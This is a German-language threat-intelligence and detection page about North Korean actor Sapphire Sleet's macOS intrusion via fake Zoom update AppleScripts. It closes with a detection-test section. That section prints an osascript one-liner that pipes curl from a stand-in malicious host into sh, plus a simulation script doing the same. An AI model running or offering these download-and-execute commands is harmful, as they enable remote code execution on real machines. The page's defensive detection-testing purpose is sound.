SOC Prime Bias: Kritisch

17 Apr 2026 15:42 UTC

Dissektion von Sapphire Sleet’s macOS-Einbruch vom Köder zur Kompromittierung

Author Photo
SOC Prime Team linkedin icon Folgen
Dissektion von Sapphire Sleet’s macOS-Einbruch vom Köder zur Kompromittierung
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Microsoft Threat Intelligence hat eine auf macOS fokussierte Kampagne gemeldet, die dem nordkoreanischen staatlich geförderten Akteur Sapphire Sleet zugeschrieben wird. Der Betrieb stützt sich auf Social Engineering, um Ziele dazu zu bringen, bösartige AppleScript-Dateien auszuführen, die als legitimes Zoom SDK-Update präsentiert werden. Nach der Ausführung ruft das Skript zusätzliche Nutzlasten durch curl and osascriptab und erweitert den Einbruch in mehreren Stufen. Die Malware ist darauf ausgelegt, Anmeldedaten, Daten von Kryptowährungs-Wallets und andere sensible Informationen zu stehlen und gleichzeitig die nativen Sicherheitsvorkehrungen von macOS zu umgehen, um auf kompromittierten Systemen aktiv zu bleiben.

Untersuchung

Die Untersuchung skizziert eine mehrstufige Infektionskette, die mit einer .scpt Lockdatei beginnt und sich durch eine Reihe von curl-bis-osascript Nutzlast-Downloads fortsetzt. Forscher identifizierten mehrere Backdoor-Komponenten, darunter com.apple.cli, eine Dienst-Binärdatei, icloudzund com.google.chromes.updaters. Die Bedrohungsakteure wurden auch dabei beobachtet, wie sie in der macOS TCC-Datenbank Manipulationen vornahmen, um AppleEvents-Berechtigungen zu erhalten, reflektierende Code-Ladungstechniken einsetzten und durch einen Start-Daemon Persistenz erreichten. Die Exfiltrationsaktivität beruhte auf benutzerdefinierten User-Agent-Strings und der Kommunikation über die Telegram Bot API.

Abmilderung

Apple hat bereits Safe Browsing- und XProtect-Updates veröffentlicht, um die Infrastruktur der Kampagne und die Malware-Komponenten zu stören. Microsoft empfiehlt, die Ausführung von .scpt Dateien zu blockieren, unsichere curl Pipelines einzuschränken, nicht autorisierte Änderungen an der TCC-Datenbank zu überwachen und Installationen von Start-Daemons auf verdächtige Einträge zu prüfen. Benutzer sollten auch vor ungerechtfertigten Software-Update-Aufforderungen gewarnt werden und keine Anmeldedaten über unerwartete Dialoge oder Skripte bereitstellen.

Reaktion

Verteidiger sollten die Ausführung bösartiger AppleScript, anomale curl User-Agent-Strings und ausgehende Verbindungen zu bekannten Command-and-Control-Domains erkennen. Alle identifizierten Binärdateien und Start-Daemons sollten sofort unter Quarantäne gestellt oder entfernt werden, gefolgt von Anmeldedatensatz-Rücksetzungen für betroffene Nutzer und der Validierung der TCC-Datenbank-Integrität. Incident-Responder sollten auch forensische Analysen an gesammelten Systemartefakten durchführen und betroffene Daten aus sauberen Backups wiederherstellen, wo immer nötig.

Angriffsfluss

Ausführung der Simulation

Voraussetzung: Der Telemetrie- und Basislinien-Vorabkontrolle muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der gegnerischen Technik (TTP), die zur Auslösung der Erkennungsregel entwickelt wurde. Die Befehle und die Erzählung MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die genaue Telemetrie zu generieren, die von der Erkennung erwartet wird.

  • Angriffserzählung & Befehle:
    Ein Angreifer hat ein bösartiges PowerShell-ähnliches Skript auf einem entfernten Server erhalten. Um die Erstellung einer eigenständigen Binärdatei zu vermeiden, nutzen sie die native AppleScript-Interpretationsumgebung (osascript) und leiten einen curl Download direkt in den Interpreter und erreichen so ein „Herunterladen-und-Ausführen“ in einem Befehl. Dies entspricht dem Muster der Regel osascript + curl .

    # Bösartiger Einzeiler, der die Regel auslösen sollte
    osascript -e 'do shell script "curl -s https://malicious.example.com/payload.sh | sh"'

    Die Befehlszeile enthält sowohl osascript and curl, sodass die Bedingung der Sigma-Regel (selection_osascript und selection_curl) zu wahr evaluiert wird.

  • Regressionstestszenario:

    # simulate_osascript_curl.sh
    # Zweck: Reproduzieren Sie die genaue Telemetrie, die die Erkennungsregel auslösen sollte.
    set -e
    
    # Definieren Sie eine harmlose Nutzlast zur Sicherheit (echo anstelle von tatsächlichem bösartigem Code)
    MALICIOUS_URL="https://example.com/benign_payload.sh"
    
    # Erstellen Sie eine Dummy-Nutzlast, die einfach eine Nachricht ausgibt.
    # In einem realen Red-Team-Test würden Sie ein echtes Skript hosten; hier behalten wir es sicher.
    curl -s -o /tmp/benign_payload.sh "$MALICIOUS_URL" || true
    
    # Führen Sie das AppleScript mit Curl, das in einen Shell-Befehl gepiped wird, aus.
    osascript -e "do shell script "curl -s $MALICIOUS_URL | sh""
  • Bereinigungskommandos:

    # cleanup_osascript_curl.sh
    # Entfernen Sie alle temporären Dateien und beenden Sie umherirrende Prozesse.
    rm -f /tmp/benign_payload.sh
    pkill -f "osascript -e"